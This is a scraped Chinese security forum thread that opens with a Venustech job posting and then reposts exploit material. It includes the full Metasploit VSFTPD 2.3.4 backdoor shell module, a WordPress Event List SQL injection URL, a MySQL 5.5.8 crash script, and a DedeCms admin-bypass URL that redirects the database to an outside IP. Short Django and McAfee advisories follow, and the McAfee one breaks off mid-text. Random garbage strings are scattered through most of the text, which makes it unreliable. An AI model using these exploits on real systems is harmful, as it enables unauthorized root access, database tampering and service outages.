最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 启明星辰研发招聘

  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: xiaoyan@sitedirsec.com
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    站内发信给我就行了。
    6 i/ G( A6 E& L) R# C. l+ T2 L+ v& h3 m9 d- n% d

    一、研发中心:Linux C软件工程师(若干)

    岗位职责:

    1." Q# c& X  G1 v) M
    安全网关,防火墙,IPS等嵌入式设备软件开发,维护

    岗位要求:

    1.
    % c4 M' M9 T! `' }精通C语言编程

    2.
    3 ]& w* A( i7 Y熟练使用Linux操作系统,精通 Linux下C语言编程

    3.) k6 g, E+ Q4 M* z6 R, {
    精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

    4.
    & p/ {: F; M; F$ b  J熟悉网络安全协议及路由器、交换机、防火墙等安全设备

    5.
    , ^4 p# D$ Z+ N+ r熟悉Linux内核及开发

    二、研发中心:测试工程师(若干)

    岗位职责:

    1.
    9 ]* N& u% D. C! T. q负责产品的系统测试、集成测试工作

    2., ^5 N- r) g' W9 S5 s0 K) d" x: ^. P
    负责产品用例的编写,执行、修改

    3.. U3 S  i! P$ P4 v7 w
    负责产品性能的测试

    4.# |$ n/ }# q" c& j8 C8 z
    负责对外项目的支持和测试工作

    岗位要求:

    1." k, [3 g9 n( w3 F( M. U! _
    掌握基本的tcp/ip知识

    2.! e: H3 O+ T6 W$ H8 [+ I/ v
    数通基础好

    3.2 t4 S  [( d% j' M
    对linux有一定的基础

    4.# U8 v$ \& B- i0 V- K  s
    掌握数据库的搭建和使用

    5.! j" T! U6 y# M3 ~( {
    至少熟悉一种编程语言C/Perl/VBS/TCL

    6.
    / N7 `/ R6 O: X  }- |7 E熟悉测试用例设计,熟悉系统测试,熟悉压力测试

    7.3 q9 y  v+ o5 T. [
    熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

    8.
    ; ~, t# M) G# v  m% L对网络安全设备在网络中的部署有一定的认识

    9.
    1 W% w" x0 o3 y; J9 V, `, `' [掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

    三、研发中心:安全事件工程师(若干)

    岗位职责:              

    1.
    - Q" y7 X6 E7 @2 M
    木&马检测服务、WEB漏洞扫描服务的实施

    2.% Y: l7 \/ _- p( @
    对服务客户的技术支持

    3.# O8 Y) O/ I' L( h
    对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

    4.
    $ Y4 a" c2 L" Z
    对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

    5.
    % ^6 r2 N0 O7 _  H
    对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究

     

    您可能还想看的主题:

    启明星辰招聘

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。
    收藏 分享

    VSFTPD v2.3.4 Backdoor 命令执行漏洞
    ################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################
    2 [4 m6 X. G. |9 ?1 a+ q8 E+ c9 c" j

    , j+ k0 r  a, u2 y$ c8 L. e  o
    & M) m) l% F* e+ m+ b7 i% }require msf/core
    ' P3 ?& u5 H. x) w8 A* A3 w4 f# V# ]
    class Metasploit3 < Msf::Exploit::Remote
    4 S5 }* h. P% g% ZRank = ExcellentRanking
      `" X7 o/ x# v
      _, N. z; z) z' L2 ~4 B/ Q1 @include Msf::Exploit::Remote::Tcp0 @: n! H5 }% m& O2 h: J4 K, H
    2 u1 }; L7 q. G* f( V
    def initialize(info = {})
    $ ^2 V  {" e6 }% A0 \6 Csuper(update_info(info
    . r- J+ A1 T6 d! G( b1 EName => VSFTPD v2.3.4 Backdoor Command Execution
    8 @1 Y' c4 H: k' O5 q) BDescript_ion => %q{
    " h' x% H' S- S0 kThis module exploits a malicious backdoor that was added to the VSFTPD download9 s1 m1 d) h3 I" _2 Y' v7 b
    archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between
    ( ~5 A) i& v+ A5 S( t7 I) WJune 30th 2011 and July 1st 2011 according to the most recent information' N& r* K2 R/ k3 p) D( n  \" L
    available. This backdoor was removed on July 3rd 2011.# ^! l6 @  i  P; T  P# X6 F; {: Z. s
    }# L% R- W' V! s" l
    Author => [ hdm mc ]
    ; x6 K7 V4 Q( Q) U4 i* }License => MSF_LICENSE6 Y! D+ t) A; t, O# i6 t
    Version => $Revision: 13099 $
    4 s# K+ t: t5 t" @References =>2 c2 \2 g3 l$ C& b5 j
    [6 M! [' c: l6 m9 R
    [ URL http://pastebin.com/AetT9sS5]+ Q% ?. v7 [' |+ m. I! i- O. z
    [ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]
    6 u; g- R. b- r# i' A; ~1 U( l]
    , \) f# C/ t4 lPrivileged => true
    9 l4 n& d9 [( K- xPlatform => [ unix ]
    # B6 h3 Q; Y9 q/ j+ KArch => ARCH_CMD
    ) x- Z1 X7 \  B2 vPayload =>2 S' W& o' o6 [9 s3 o- G# D, |
    {
    - y! P1 v' E9 z" u$ ~' FSpace => 2000
    0 z/ O: g6 [+ q$ J& M" ]- ]BadChars =>
    % U- l  M" ^4 }) t3 y, LDisableNops => true
    0 S  Y! \/ E! W, }) K: c; a7 x8 U; v- [Compat =>4 T) |$ f3 r; Z- c9 _5 H+ K9 _
    {
    7 |" b$ A- K& }$ J) f: L. ~4 R) P9 WPayloadType => cmd_interact
    7 [! y3 `2 n- Q7 e+ VConnectionType => find/ s: }2 R' d; k2 x5 I
    }& I2 }& a, p& r6 ~; r( H$ {1 n/ a* ~
    }" g% c! [- \$ B/ H  p6 r
    Targets =>
    . r$ G) _  P! x% n7 U9 L[+ W5 G4 ^+ o0 F) n" z
    [ Automatic { } ]- r1 s+ S0 g- c/ m3 Q) _& Z& A
    ]; v* l1 t. r5 Y* {/ }( t
    DisclosureDate => Jul 3 2011
    ) K, M$ j1 z! x8 Y0 H- ^  t3 XDefaultTarget => 0))
    , j' ?+ x$ K# M3 s
    6 Z  g# o" D! m- `% C* u" e7 Z2 fregister_options([ Opt::RPORT(21) ] self.class)
    9 k( B( `/ o4 O' N( ^5 jend1 K8 A# `9 Z9 h9 i

    " i8 A5 O0 Y' X/ xdef exploit
    3 l- d; }+ V, c  W7 D. ?9 ]: L, W4 m6 Q
    nsock = self.connect(false {RPORT => 6200}) rescue nil
    ) d! |% q; d! X7 l/ G$ t3 ]if nsock; W# s: {: K/ P
    print_status(The port used by the backdoor bind listener is already open)6 V/ Z$ E$ }( ^9 R, _6 Z; Y4 \
    handle_backdoor(nsock)& q2 N) N" Z0 N$ A; k
    return; L7 o- X. j4 F" x& u# x
    end
    ) Y4 `. i' d! V3 ^7 I6 ^
    ( a8 [  [: I  k0 e5 j' [7 N# Connect to the FTP service port first
    $ I7 E/ O  w2 @. Pconnect1 n9 S" c* M6 {# l% w

    1 N! e: y7 H& u* y+ r* Vbanner = sock.get_once(-1 30).to_s* t- P  ~( H8 l9 c
    print_status(Banner: #{banner.strip})" z  N) Z# a4 I! Z2 F5 L

    ! Q0 @. r- G) qsock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)9 q0 Z& w( i- j" Y" ^
    )% h- v2 k3 |* ~( Q# D6 s, x, M6 M
    resp = sock.get_once(-1 30).to_s
    # D- m( ~3 H- Jprint_status(USER: #{resp.strip})
    0 j3 k( X+ q' E6 S  \
    + {+ m& D3 F% L1 ~( Z* Hif resp =~ /^530 /& r" ~( V/ q+ w) a
    print_error(This server is configured for anonymous only and the backdoor code cannot be reached)2 Y) g3 j; }  ~- p0 B
    disconnect8 ]/ d" E" e1 E8 u2 {4 y
    return
    * c$ t/ x% {3 n1 O" N6 m% fend
      |7 o, E" ~% X- g$ L4 `$ E. X; E* s" \' _( r3 f; G
    if resp !~ /^331 /7 F- ~3 {# n# V: N# e
    print_error(This server did not respond as expected: #{resp.strip})% w! a8 w1 N3 x2 |7 C
    disconnect
    $ z1 P8 p) A( F8 b$ h7 \4 K8 O  P2 wreturn
    + _' G( _; w4 P  cend
    6 Y6 a$ ?0 z- w$ m" d
    / z% y# t4 u" }/ W! G: S! q" osock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}! o/ V9 I' \7 y2 D* r3 E% ^; r
    )
    / b4 T5 R* O4 b" U6 O# G" b2 @% l3 ^3 s+ \
    # Do not bother reading the response from password just try the backdoor# Q0 v' T! f( c" Z
    nsock = self.connect(false {RPORT => 6200}) rescue nil
    $ R' }6 p. ~( P0 D$ ]if nsock
    0 g6 }' d) ~7 c4 f) i2 U3 L' Lprint_good(Backdoor service has been spawned handling...)
    ' X. g% M# t: V+ Vhandle_backdoor(nsock)
    : \8 y2 M  `% ~" l8 Ereturn; Q) x6 L6 J& Y0 t8 ^7 q
    end, P. p$ j+ V. S4 n: M, Z0 T

    4 |) ~/ H& S* N7 f6 ~8 pdisconnect
    4 }: P$ z0 P+ G/ h% A1 h. M6 ]" L/ r/ Q$ C9 c' u
    end
    * Y1 g/ v0 G$ w  J2 k* Q+ @, P5 P; ]7 Q& D* g0 \8 Y4 M: N
    def handle_backdoor(s)
    7 i, X, _& \$ \8 D6 a% w1 k/ S
    3 Z/ d$ x" b! _- k+ t: ~s.put(id0 `2 {4 y! Z) d
    )
    9 y& V. Q4 T3 W3 }0 |/ n* Z. ~" T2 f: F: ^. r6 w, A8 b  _, u
    r = s.get_once(-1 5).to_s" q' }5 k+ k  q9 |, E) n
    if r !~ /uid=/
    ( V6 L2 T' n( N. zprint_error(The service on port 6200 does not appear to be a shell)
    ) S" k: C4 V+ e  i5 e2 B; s: Z9 Udisconnect(s)
    ; y7 n1 w+ D  g$ g0 W7 jreturn: C9 r& }' J* m, y) E4 X# ~
    end* E3 g% I% F2 h

    " E1 \+ K. S5 G+ tprint_good(UID: #{r.strip})* \6 u" T7 P& _/ ^

    3 m7 I) k( ~' rs.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)* ]0 m- q+ k4 ~
    handler(s), q; r! \  ~* U8 D0 h2 b
    end
    6 w, z4 r- }4 r" Z" M0 q% E- U! D) i5 I$ o5 A5 ?+ h# s4 N
    end复制代码
    * d! i% U8 k& j" \0 i- P/ m! g0 Y# `2 x

    2 M7 i7 L( d- P; s
    % a! m% |7 G# _( Z' ]
    ! y. k) m. w9 L2 n2 V. x, H2 D* T% T2 S' R
    9 O2 y: g& E) j

    4 h/ M+ q  |: l! E; e. `- c" z
    0 M, T9 q) ^: C& h  S. N9 {
    ) ~4 c2 Q- ?3 r
    - m* `& i! V( s/ R$ v' L' m
    " M+ X& \' u/ `
    % v: t. e# R: S. l  a& t. H( {
    : x$ e2 x/ f& ^8 U( z
    ) u, D1 o7 L! R8 k& {- T
    , J, M8 E$ {0 Z$ l, R7 K4 T1 t% `: P3 o) u9 v, g

    % w, h! R" Z, B7 C& Y' {* a, _' N- T3 T  T& ^. a" g! K) Y
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
    1. Description:
    ' z! Y4 N: L' K( w1 D7 s* }* q    J5 @/ }! [- n: n4 H$ b
         
    3 V& y; e5 I3 p8 P3 H7 }- [  ) y- u! h+ A5 c; c9 G2 T) N- m: J8 k
    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress5 q$ e- z* u5 f, k$ p1 G
    allows an authenticated user to execute arbitrary SQL commands via the id
    , Z! B, B0 b5 ?7 e! wparameter to wp-admin/admin.php. 6 ~, }" j# U" t, i$ x( i
      - q/ L( W2 t5 F: F/ b# `) [; T
       , q* C$ H6 e) _6 c0 ]6 R
      6 U3 Y0 f( Z! M. _" Y
    2. Proof of Concept:
    ) G% I& c0 g3 U0 {5 l$ E  
    3 y% I3 E  h* t& p7 g: M: R   
    " @+ z- }% ^/ @/ Z$ A4 M  $ ~% E; `9 W$ q# [) n: P
    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id
    ) `* R5 I; i% [  x. S=1 AND SLEEP(10)8 Z/ q1 `0 ?# W' K2 @5 y7 I

    $ u. E. v" K0 ?* s# d7 J" Z  
    / j+ ~9 D/ D# d+ n3 h- o1 `   2 I" k! t( r1 c! Z
      
    ( k) D( e+ Z3 b* N' y3. Solution:
    ( L" j8 V; n: i0 M; t  b  
    " e& L- j* Y( ?5 ~3 F     
    - o: w" }1 P& }8 c  e+ L  6 L. l; o' v/ A
    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    & [; h8 q% o, N8 efor a hotfix.
    * J/ p# ~: V& q4 x8 ^* d$ }  0 ?* Q4 }) D  N' S' e
       
    * p4 F8 Y- \( v$ T& o  
    ( T1 z$ d. x+ n; a* c6 n4. Reference:% q4 t: P: k0 B
      ! {" K# M$ e7 |: L
       
    # H: x# W: H) N7 d# B) Z  
    9 ^: [4 j4 |! `0 l5 p( w7 Phttp://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
    8 u5 K0 \7 t: W& E- E8 z* {/ hction-sqli/
    ' X& Y; b  E* T2 N& Q  . z2 g- O* p7 m8 \7 u5 D
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
      g  a" t- p1 ?; m! r: e- T# B& r6 J% k
    , B% ]7 `' l. b% C3 m
    % j" Z8 l' h5 a9 R$ D- d, e

    2 d3 u+ W( C! q$ Q9 k/ N; M  _5 e5 r/ q. h  p" H3 N) f, `

    2 z2 h% z7 o; R7 }
    ! B3 W, n5 q& ]  o  W( G- L+ ~1 q6 R! u8 P

    9 _- E' K- w# z  J7 ~
    , ^* J( u% O# u& d5 G9 O# y* G. @$ W7 z$ ?! w( u- b( M* I9 ^2 L. B
    3 G, r3 t, O5 q* n# p

    8 F6 Z% h8 e- G1 H0 a1 f2 `7 L8 ?8 ^( ^' X7 C9 d4 ~6 H0 }
    / Y3 u7 q6 A/ y) F  [" |
    + I8 o* V+ d/ _1 R) I
    2 p& e+ |) I0 F3 v( b
    ! M% f* t% M# D* X. C# z9 ~
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MySQL 5.5.8 远程拒绝服务漏洞
    import socket, sys9 l0 j' R* W* z- q1 F. `1 O
    ! n4 P( ~7 }" Q+ H1 M4 r
    print "
    : M; f9 a; e# I  H4 k3 i% X"1 A% l# k/ |7 g! O7 E5 x& p0 k
    print "----------------------------------------------------------------"5 n8 W+ E8 D3 Y& V) j
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"
    " v1 e7 G& |# Hprint "| Level Smash the Stack                                         |"8 K) L% ~& o5 A& h
    print "----------------------------------------------------------------"
    5 Q2 P$ j5 k" g- }+ D, N5 dprint "' K  k; K' F3 w! Z$ m. y
    "( o, |0 H6 T0 z, s

    8 W* V$ o# t% F% x3 g: {buf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"6 }; ]& f' M5 P' _3 ~
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")2 x6 U( H7 b9 e0 N
    % S! H2 {8 p: G; e6 E, j
    buf2=("x11x00x00x00x03set autocommit30")
    # b# U. g. S" M! \- t6 |0 l
    5 u# v- b/ l, o  T4 }  K# g, Bdef usage():
    + o( P* }% I% r% hprint "usage : ./mysql.py <victim_ip>"; E$ f% j$ u" ?7 R8 p
    print "example: ./mysql.py 192.168.1.22"
    $ s  y5 K; C" `( f7 a
    3 Y% I; V( b' n& k
    & ~* y( T( o% s2 y6 n9 gdef main():3 H/ G% P8 @4 A# g  h$ h" o
    if len(sys.argv) != 2:
    / Z) G- C0 Z4 L/ s* }/ b4 f; Y5 J$ musage()
    * u0 K  C6 m# F& x* B% w- Z6 p  I2 |; ~- B5 zsys.exit()
    + e) p6 F) Q- \" Y4 ^% Z7 ]" ys = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    $ l1 ]" @$ ~1 V  ^& M 3 b1 W6 a7 G$ w9 \# u% _! p
    HOST = sys.argv[1]
    7 d$ k$ F) ~; J6 l8 S  d$ Z4 Q4 \PORT = int(3306)7 r6 U: T1 f, w4 e
    s.connect((HOST,PORT))6 K" L+ a- S* B5 k
    print "
  • Connect"1 y$ l5 P# m* Z( \/ c
    s.send(buf)
    3 d0 U; e' D) F- F. @print "
  • Payload 1 sent"
    . }9 y" A0 C9 N) M  d# L' l2 G1 Zs.send(buf2)* \* I# K) y3 z# R
    print "
  • Payload 2 sent+ X# {: w: G2 U) _$ w
    ", "
  • Run again to ensure it is down..
    / {; y+ ^- z" X7 Z"
    1 ^2 @+ S" R8 ]$ Q" z* @s.close()
    4 \, L6 |% c( O/ i5 O, J5 |) G & s& `$ A/ Q! E( |
    if __name__ == "__main__":0 k5 {2 L" y  y. }
    main()
    ) j8 H. p* V+ ~8 O( Q8 v
    6 M8 c/ G" M- P' Q3 m+ k2 s
    9 P4 I# J. @: V' @. b
    8 a7 ~- B# f) r1 s: W" T& i* T) b. R; [1 {' g1 j6 L
    1 _6 _% }5 J$ Q7 m

    . ~3 x- ~6 Z8 R6 O# P* b+ N' X! l7 ]% w7 G3 L0 r' g( L  g+ ^
      C7 {# }+ e6 g. z- M
    : h2 X- m  L3 L/ f. v# X
    # o9 ?& h2 q' f' ]( x$ L

    - a% r: x8 {8 O5 p  \& e
    4 S: u& d# M. s. o. M- J' ?. L1 u& J7 Q

    8 K* B0 A2 K; A2 R' L3 |, u
    / O% _: s: t4 P  Z+ n8 X+ V( h  D; I2 K# [' W
    / x+ f8 ^5 A, j. L9 [4 Q
    ! _# P! F! f  }0 o$ ~
    公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    手把手教你装Linux系统-设置虚拟机

    0 e* W5 _7 t' |9 p% chttp://www.sitedir.com.cn/video/4.swf
    # K- M; k% U! U8 l8 _/ k" ]0 s6 k9 |

    * X5 F; t/ q0 Z1 d" c7 `. _4 j. W; H( u" ~  V" X
    7 X. ~! w; r  O# N* }$ g" `
    ; R" P& _# Y& e) Y! R3 d

    9 e! K9 b7 d: K+ k, c3 _, S. D0 e! v$ ~( S! ]) U3 F

    1 r* C: S- a* ^" ^: t6 d& d
    - d4 k1 ^* J& M8 Q8 ~+ Y! }3 C
    8 v" U( i3 y8 ~; x. j
    1 J/ o5 V: u  {2 S. e2 r. c& d/ ?! H& s" U& d+ I" D3 u# l
    # I% h8 |& D+ W; N, _/ m
    5 P5 F3 X/ _, _4 g
    5 i9 o: w1 n8 c5 a
    ) F$ }9 p3 c6 b7 h# L8 k

    8 r7 `( v9 R( d  S" |) j% O& O6 h" w
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root
    , `3 T# q. U$ H' ^6 i/ a
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台

    ' C- R3 F( j0 q4 s2 z! O" n
    此漏洞的前提是必须得到后台路径才能实现

    * j1 w+ H7 s4 W
    官方临时解决办法:
    + l* M: [( U! q$ ^0 V1 a. y
    找到include/common.inc.php文件,把:

    ! I& }1 t6 |- c0 p% c
        foreach($_REQUEST as $_k=>$_v)+ _4 ~# O& T( u
        {
    7 j6 Z9 u. s2 H( C        var_dump($_k);: ^  t' {, q# _, b& h& `+ F9 U5 T
            if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )
    # W8 F, p/ f- m5 U        {* L& n! F% V8 ?( {: G
                exit('Request var not allow!');4 {2 n9 a& Q" F/ x. n( ~9 x8 g
            }
    9 F* w7 j0 ^5 U) L. j" m+ X* j    }

    : M. n; e0 K2 a3 U5 n- `! }  t% B; C2 s
    换成:
    * a- |* C. Q" i! W4 i
        //检查和注册外部提交的变量7 b& R3 _# t( b6 R. _; i8 a0 H' s
        function CheckRequest(&amp;$val) {
    ( G) ^. c5 u$ d. G) V: ^- ~        if (is_array($val)) {
    $ |4 E- l7 Z6 t            foreach ($val as $_k=>$_v) {3 \- U+ n2 c! j
                    CheckRequest($_k);1 X5 B1 R# m5 P) N, v8 A+ d
                    CheckRequest($val[$_k]);
    . W3 z6 ?; f; w% P# S            }
    + E4 N: k6 V* e& S6 J        } else
    ! W9 _4 D# T6 S; f9 M" W        {; I" A, T7 C+ |% ]
                if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )
    ! S/ K  M6 g$ `0 c( m            {
    & t( b; f9 Z3 x: o( F) F* u                exit('Request var not allow!');
      M+ A7 ?% n+ i$ j) J$ R( s  h8 H            }
    6 R: r& l. e; m: }        }
    . o1 |% O% O% O1 \- i6 C    }& I' V, l. G. k; W( _4 D) Y
        CheckRequest($_REQUEST);$ ?3 u4 a" _0 V) e
    6 e% o. i6 P5 c  C" K6 A
    6 J$ K& `% @; G* \8 Y1 d6 k

    ! F. H! g, D( r, n; y
    8 ^, i  c" y( y0 y9 S# Z
    * Z3 K. j% e. n  a* B6 s2 }* Y5 S3 @9 a6 L0 m7 K0 h+ q
    ) B) q! [# ]+ X) X- ?. g
    * z, _" y: R- g% {# e

    6 w, N+ V0 L; A) M/ l- T$ C7 ^3 z: s
    % j, P/ T+ r: S3 U0 ]+ S( c! A- f' N9 j/ Y+ S
    2 T6 a9 `2 n% ]* y/ y+ ?: \% i% H2 X
    0 f' s! m6 J; v- M! M

    + h  Q4 z1 }! i2 P& T3 W1 V$ r  P$ ?8 q* e/ w
    8 _. q* H: _- F# o$ s: |

    % i! |, h4 E9 o! ^% O: U) Y" x
    - E5 \9 T( m: @3 D7 o! A/ z
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>
    0 ]8 V* W* G, U5 W& d2 u5 n& _% b2 W$ s+ h3 W+ A
    http://www.sitedir.com.cn/video/8.swf[/quote]
    1 u% H6 K% b: i( E  W  S. Q$ N+ C+ C; d4 t1 _3 p$ t
    1 r7 V+ F7 @! E; [9 M$ g* p
    % \% Q2 Q: Z% J+ g

    * J" e' ~- k- q' o/ D) M
    9 H2 ^# t: W8 e8 ?
    4 c6 y+ R% q# k! f( a: m) F6 r
    5 o. \, K- N$ N, b) a/ X3 e! ]# D) F. b1 W6 {8 M& P$ u) A

    $ f, W; a0 T! L2 Z7 Z# u  E
      \" H% k9 X0 Q" [# O& D( t9 b) O6 M# q7 U& z/ |7 y
    1 q7 n! _* @/ m8 L3 I, \3 S
    ' P1 o0 k* m- H) V, @

    ' i4 G$ P6 b1 H4 F% B3 V+ k! ]' O8 a8 d' r
    6 {( h+ w6 O" m  K* a# |" H2 U
    3 U& d, f$ r4 c
    7 U. g7 Z2 K/ y) Q4 B& g. U' ^$ c
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12

    7 B7 c+ Y8 ~$ @# i. T" [: y1 O) F: u
    影响版本:
    2 p# H' K0 T3 s7 S( CDjango 1.2.5
    ' I& ?& o! k2 H$ `! ~1 t4 KDjango 1.3 beta 1% i; h) D6 \5 u! ^, a
    Django 1.2.4
    : v+ f$ }, H$ P9 [; U. z: WDjango 1.2.28 ?! R" @1 |1 T: ~0 G; f% N
    Django 1.2
    " d# s2 |2 W1 `& B# L
    漏洞描述:

    5 _) C6 x6 D' ?5 h% e: U
    Django是一款开放源代码的Web应用框架,由Python写成。: f8 K4 d4 {* X
    Django存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。
    1 I; ^  U2 a! K1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。9 C7 b# V) W# ~" Q, U( S( p3 S
    2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。
    ) _4 {' u% H$ x3 [4 O3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。
    4 ^$ K* z5 L6 Y4 }: {8 D4 B/ Y4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。

    6 \* \1 e# g/ ~" g+ X1 S$ I
    细节参考:
    8 e/ K( Q; @  s/ B5 Vhttps://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    ; n( {- V& H3 G% phttp://secunia.com/advisories/45939/

    ( b. v* S4 P3 k3 h2 p% v* h$ ^

    1 i; S* A# d$ |) s  f5 L8 M" M, B5 @- n2 j, a

    # z1 W. l/ p3 `/ V, r- I( B0 r7 L8 {

    4 _0 o. Y$ t- y; Z6 Z1 z: z
    7 e: f% H. N0 t0 |! l( [$ G, j
    6 P* k3 F( P* S% h3 f* I
    + [: a: B; C9 W) y$ ^2 ^# i
    . ]6 _5 N1 T% f# C2 F' P4 U- c* M
    7 F' c5 r, U" l  F( j4 R
    4 U9 n; Q! r5 l) \  _  w* S$ g* v# T# _6 t

    # }6 M' x) R" R" e; ]3 M, K+ d$ F
    - @* s  p7 n0 X! a1 H% ?
    # M9 g! A! E& m' F+ F
    ; p- G- I: F% x! [- A
    ! W% h) W& R* B" K- x9 \4 i
    & l! W- _9 V! L* F4 _0 j9 n; @- i" @! s. Q
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code1 S' W& R# @5 @1 A* N
    影响版本: McAfee LinuxShield <= 1.5.1- \! v. S) W; i& l. Q) F9 ]0 H$ D# I
    远程攻击: Yes
    , B* r* e0 c2 M7 _8 e/ c$ g本地溢出: Yes
    . e) l1 D* a% M; I背景阅读:
    8 m. C  P. Y: }6 P. t, B8 D===========1 z9 I: ^. E4 F3 t9 A' u( A' _' I
    9 _$ ^4 L2 ^8 f! b/ W( e
    LinuxShield detects and removes viruses and other potentially unwanted
    5 B+ T- b* Q; t- m+ ysoftware on Linux-based systems. LinuxShield uses the powerful McAfee- j3 q7 o! S5 `. y# Q0 Y5 t
    scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our4 K; A  c' _- r- i' e/ f' c
    anti-virus products.( O9 L4 {" g+ k# U+ h1 U9 X4 q

    / _# e9 `' U2 N6 eAlthough a few years ago, the Linux operating system was considered a8 a! f) P6 ?* d; o
    secure environment, it is now seeing more occurrences of software
    " B* N& C3 c) |  k5 \specifically written to attack or exploit security weaknesses in# |. ^  P- x) F' ^' e' C8 `
    Linux-based systems. Increasingly, Linux-based systems interact with7 M8 I, A$ O+ S' X& u) c5 h
    Windows-based computers. Although viruses written to attack Windows-
    . L% w; u! j; d8 _based systems do not directly attack Linux systems, a Linux server& K+ Y8 Z9 g3 A( j# q$ {
    can harbor these viruses, ready to infect any client that connects to
    2 O% S3 P+ q/ Zit.
    0 [" S  @2 n  Q& M' I  e
      B# |3 g0 ^( c" {When installed on your Linux systems, LinuxShield provides protection$ f3 ?/ a' R- U& w2 ~5 B2 z* A
    against viruses, Trojan horses, and other types of potentially2 P0 h' }( p' S: z0 g' q& j8 j
    unwanted software.
    , C3 W. J% `  `4 v, F) W) j) l" u
    3 j- N- Q! \1 i& g2 ?LinuxShield scans files as they are opened and closed
    4 @- A9 G7 ?6 q5 Z7 V8 t) Q?&amp;#65533;&amp;#65533; a technique
    / ]) t; `1 m* X/ l) v8 O9 ]- hknown as on-access scanning. LinuxShield also incorporates an- {" C* i2 S; F+ B7 F- `
    on-demand scanner that enables you to scan any directory or file in0 N& x0 }: H; I, I
    your host at any time.+ x: Y7 ]) x5 p% @4 D' r1 S

    , ]2 i4 A& o9 \0 F0 X) o/ gWhen kept up-to-date with the latest virus-definition (DAT) files,9 O, B2 W5 b# j
    LinuxShield is an important part of your network security. We2 W: r1 o# t& A+ `# P
    recommend that you set up an anti-virus security policy for your' k5 c, I% C' P7 B' h) Z/ k
    network, incorporating as many protective measures as possible.  N2 S! o/ W" T- u- c3 P9 T% v
    ( f, p, X/ H" _7 j2 X3 F
    LinuxShield uses a web-browser interface, and a large number of
